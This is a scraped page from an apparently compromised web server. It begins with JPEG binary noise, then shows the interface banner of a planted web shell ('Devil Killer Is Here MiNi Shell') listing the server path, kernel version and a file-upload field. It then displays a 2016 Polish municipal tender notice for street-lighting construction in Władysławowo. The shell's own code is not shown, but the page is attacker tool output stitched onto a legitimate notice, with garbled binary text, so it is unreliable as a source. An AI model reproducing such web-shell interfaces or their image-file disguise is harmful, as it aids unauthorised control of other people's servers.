JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161018/325763-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='bip.wladyslawowo.pl' target='_blank'>bip.wladyslawowo.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 325763 - 2016
              z dnia 2016-10-18 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Władysławowo: wykonanie robót budowlano-montażowych związanych 
z  budową oświetlenia drogowego 
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Władysławowo, krajowy numer identyfikacyjny
              19167541600000, ul.
              ul. gen. J. Hallera 
              19,
              84120  
              Władysławowo, woj.
              pomorskie, państwo
              Polska, tel.
              58 674-07-21, e-mail
              , faks
              58 674 54 36.
              <br />
              Adres strony internetowej (URL): www.wladyslawowo.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />bip.wladyslawowo.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy złozyć osobiście w Urzędzie Miejskim we Władysławowie przy ul. Gen. Hallera 19 pok. 208 lub przesłać pocztą lub kurierem na adres zamawiającego<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>wykonanie robót budowlano-montażowych związanych 
z  budową oświetlenia drogowego 
<br /><b>Numer referencyjny: </b>ZP.271.19.RGK.16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem postępowania i zamówienia jest wykonanie robót budowlano-montażowych związanych z  budową oświetlenia drogowego części ul. Lazurowej i Południowej w Ostrowie,  części ul. Nadbałtyckiej w Karwi, części ul. Modrzewskiego i Dąbrowskiej oraz placu zabaw przy ul. Źródlanej i Szkutników we Władysławowie, części ul. Wiatrakowej w Tupadłach, części ul. Leona Wzorka w Rozewiu i skweru nad Zatoką Pucką we Władysławowie . 
2.	Zamówienie podzielone jest na pięć części. Każdy wykonawca może złożyć ofertę na wszystkie części. Szczegółowy opis przedmiotu zamówienia zawarto w  nr 1 do siwz oraz Projekty Budowlane i Wykonawcze, Specyfikacja Techniczna Wykonania i Odbioru Robót, Przedmiar Robót oraz wzór umowy  załącznik nr 7 do SIWZ, znajdujące się w komplecie materiałów przetargowych.
3.	Wszystkie nazwy własne materiałów i nazw producentów, użyte w dokumentacji przetargowej powinny być rozumiane jako definicje standardów, a nie konkretne rozwiązania mające zastosowanie, a do wbudowania mogą być użyte materiały i urządzenia innych producentów o parametrach równoważnych lub wyższych niż przewiduje dokumentacja przetargowa. Wszystkie koszty wynikające z tytułu zamiennych rozwiązań ponosi Wykonawca. Podane w niniejszej specyfikacji istotnych warunków zamówienia oraz w załącznikach ewentualne nazwy własne (pochodzenie, producent, itd.) mają jedynie charakter pomocniczy dla określenia podstawowych parametrów i cech zastosowanych materiałów. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. Produkt równoważny to taki, który ma te same cechy funkcjonalne, co wskazany w dokumentacji konkretny z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza od jakości określonego w specyfikacji produktu oraz powinien mieć parametry nie gorsze niż wskazany produkt. Zamawiający dopuszcza rozwiązania równoważne opisane w dokumentacji projektowej, Polskich Normach, polskich aprobatach technicznych oraz polskich specyfikacjach technicznych. Zastosowanie materiałów, urządzeń, rozwiązań, Polskich Norm, polskich aprobat technicznych, polskich specyfikacji technicznych, będących zastosowaniami równoważnymi, podlegać będą sprawdzeniu i akceptacji przez inspektora nadzoru inwestorskiego oraz projektanta na etapie wykonywania robót budowlanych.
4.	Wykonawca zobowiązany jest do wykonania na koszt własny, w okresie udzielonej w ofercie gwarancji i rękojmi, bieżącej konserwacji oraz przeglądów okresowych zamontowanych urządzeń i elementów wyposażenia zgodnie z zaleceniami bądź wymaganiami ich producentów, przeglądów wynikających z opracowanej na koszt własny przez Wykonawcę instrukcji eksploatacji obiektów, a także przeglądów okresowych wynikających z przepisów Prawa budowlanego, w tym m.in. wykonania pomiarów kontrolnych wybudowanych sieci w okresach wskazanych przez Wykonawcę.
5.	Wykonawca (oraz jego podwykonawcy),  z którym zostanie zawarta umowa o udzielenie zamówienia publicznego, zobowiązani będą do zatrudnienia na podstawie umowy o pracę pracowników do realizacji niniejszego zamówienia na cały okres jego realizacji.
	W przypadku wyboru jednego wykonawcy na jedną lub dwie części, 	Wykonawca zobowiązany jest do zatrudnienia co najmniej:
	- dwóch  pracowników, zatrudnionych w pełnym wymiarze czasu 	pracy, 	posiadających uprawnienia zawodowe SEP na stanowisku eksploatacji oraz 	posiadające aktualne 	świadectwo kwalifikacyjne uprawniające do 	zajmowania się  eksploatacją 	urządzeń,  	instalacji i sieci elektrycznych i 	elektroenergetycznych,
	- jednego pracownika, zatrudnionego w pełnym 	wymiarze czasu pracy,  	posiadającego uprawnienia zawodowe SEP na stanowisku dozoru oraz 	posiadającego aktualne świadectwo kwalifikacyjne uprawniające do zajmowania 	się  eksploatacją 	urządzeń, instalacji i sieci elektrycznych i 	elektroenergetycznych.
	- jednego pracownika, zatrudnionego w pełnym wymiarze czasu pracy, 	posiadającego uprawnienia operatora maszyn budowlanych. 
	W przypadku wyboru jednego wykonawcy na więcej niż dwie części (tj. na 	trzy lub cztery lub pięć części), 	Wykonawca zobowiązany jest do 	zatrudnienia co najmniej:
	- czterech  pracowników, zatrudnionych w pełnym wymiarze czasu 	pracy, 	posiadających uprawnienia zawodowe SEP na stanowisku eksploatacji oraz 	posiadające aktualne świadectwo kwalifikacyjne uprawniające do 	zajmowania 	się  eksploatacją 	urządzeń,  	instalacji i sieci elektrycznych i 	elektroenergetycznych,
	- dwóch  pracowników, zatrudnionego w pełnym 	wymiarze czasu pracy,  	posiadającego uprawnienia zawodowe SEP na stanowisku dozoru oraz 	posiadającego aktualne świadectwo kwalifikacyjne uprawniające do zajmowania 	się  eksploatacją 	urządzeń, instalacji i sieci elektrycznych i 	elektroenergetycznych.
	- dwóch pracowników, zatrudnionego w pełnym wymiarze czasu pracy, 	posiadającego uprawnienia operatora maszyn budowlanych. 
<br /><br /><b>II.5) Główny kod CPV: </b>45200000-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 60<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Z uwagi na to, że termin realizacji zamówienia stanowi jedno z kryteriów oceny ofert, Zamawiający przyjmuje minimalny okres na realizację zamówienia: 45 dni, natomiast maksymalny termin wynosi 60 dni.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                w celu oceny sytuacji finansowej Zamawiający żąda, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości:
- część I:  100.000,00 zł,
- część II:  100.000,00 zł,
- część III:  80.000,00 zł,
- część IV:  50.000,00 zł,
- część V:  50.000,00 zł,
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                w celu oceny zdolności Wykonawcy do należytego wykonania zamówienie oraz w celu zapewnienia odpowiedniego poziomu konkurencyjności, Zamawiający stawia warunki dotyczące:
1) doświadczenia - polegającego na wykonaniu w okresie ostatnich ośmiu latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, licząc wstecz od dnia upływu terminu składania ofert:
- część I: co najmniej jedną robotę budowlaną polegającą na budowie oświetlenia drogowego, o wartości nie mniejszej niż 50.000,- zł brutto;
- część II: co najmniej jedną robotę budowlaną polegającą na budowie oświetlenia drogowego, o wartości nie mniejszej niż 50.000,- zł brutto;
- część III: co najmniej jedną robotę budowlaną polegającą na budowie oświetlenia drogowego, o wartości nie mniejszej niż 50.000,- zł brutto;
- część IV: co najmniej jedną robotę budowlaną polegającą na budowie oświetlenia drogowego, o wartości nie mniejszej niż 50.000,- zł brutto;
- część V: co najmniej jedną robotę budowlaną polegającą na budowie oświetlenia drogowego, o wartości nie mniejszej niż 30.000,- zł brutto;
2) osoby skierowanej przez Wykonawcę do realizacji zamówienia na odpowiednim poziomie jakości (jedna osoba na wszystkie części). W celu wykazania spełnienia tego warunku Wykonawca musi skierować do realizacji zamówienia osobę, która będzie pełniła funkcję kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych branży elektrycznej bez ograniczeń, a także posiadającą minimum pięcioletnią praktykę zawodową i doświadczenie w kierowaniu co najmniej jedną zrealizowaną robotą w zakresie budowy oświetlenia drogowego, w zakresie odpowiadającym posiadanym uprawnieniom.
	Zamawiający określając wymogi dla kierownika budowy w zakresie posiadanych 	uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, 	które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz 	odpowiadające im uprawnienia wydane obywatelom państw Europejskiego 	Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a 	oraz innych przepisów ustawy Prawo Budowlane (Dz. U. z 2013r., poz. 1409 ze 	zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w 	państwach członkowskich Unii Europejskiej (Dz. U. z 2008r., Nr 63, poz. 394 ze 	zm.).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.  
W przypadku oferty wspólnej ww. odpis składa każdy z wykonawców składających ofertę wspólną. 
WW. dokument należy złożyć w oryginale lub kopii potwierdzonej za zgodność z oryginałem.

	2) jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 	Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1   	składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce 	zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie 	ogłoszono upadłości  wystawiony nie wcześniej niż 6 miesięcy przed upływem 	terminu składania  ofert.
	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub 	miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się 	dokumentów, o których mowa w pkt 2), zastępuje się je dokumentem 	zawierającym odpowiednio, że oświadczenie Wykonawcy, ze wskazaniem osoby 	albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której 	dokument miał dotyczyć, złożone przed notariuszem, albo organem samorządu 	zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce 	zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) wykaz wykonanych robót  budowlanych wykonanych w okresie ostatnich ośmiu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty. 
W przypadku, gdy referencje lub inne dokumenty potwierdzające należyte wykonanie  robót budowlanych wskazanych ww. wykazie znajdują się w posiadaniu Zamawiającego, w celu potwierdzenia spełnienia warunku dot. doświadczenia Wykonawcy, Zamawiający będzie korzystał z posiadanych dokumentów, o ile są one aktualne.
	Ponadto, jeżeli załączony wykaz wykonanych robót budowlanych będzie potwierdzać wysokość tych robót w walucie innej niż PLN, Wykonawca powinien dokonać przeliczenia na PLN wg średniego kursu NBP z dnia, w którym ogłoszenie o zamówieniu zostało opublikowane w Biuletynie Zamówień Publicznych. W przypadku, gdy w przedstawionym wykazie wskazane  zostaną przez Wykonawcę wartości w walucie innej, niż PLN, Zamawiający dokona przeliczenia na PLN wg kursu średniego NBP na dzień, w którym ogłoszenie o zamówieniu zostało opublikowane w Biuletynie Zamówień Publicznych;
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz.
Ww. wykaz należy złożyć w oryginale, natomiast dowody i inne dokumenty w oryginale lub kopii potwierdzonej za zgodność z oryginałem.

2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia, odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz.
Ww. wykaz należy złożyć w oryginale.

3) dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
W przypadku składania oferty wspólnej ww. dokument składa ten/ci z wykonawców składających ofertę wspólną, który/którzy w ramach konsorcjum będzie/będą odpowiadał/odpowiadać za spełnienie tego warunku.
Ww. dokument należy złożyć w oryginale lub kopii potwierdzonej za zgodność z oryginałem.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">	1) zobowiązanie podmiotu trzeciego (załącznik nr 7) - jeżeli wykonawca w celu 	potwierdzenia 	spełnienia warunków udziału w postępowaniu, zamierza 	polegać na 	doświadczeniu, zdolnościach technicznych lub finansowych innych 	podmiotów,
WW. oświadczenie należy złożyć w oryginale lub kopii notarialnie potwierdzonej.
	2) odpowiednie pełnomocnictwa w sytuacji, gdy oferta będzie podpisana przez 	osoby upoważnione do składania woli w imieniu wykonawcy oraz w przypadku 	składania oferty wspólnej.
	WW. pełnomocnictwa należy złożyć w oryginale lub kopii notarialnie 	potwierdzonej.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
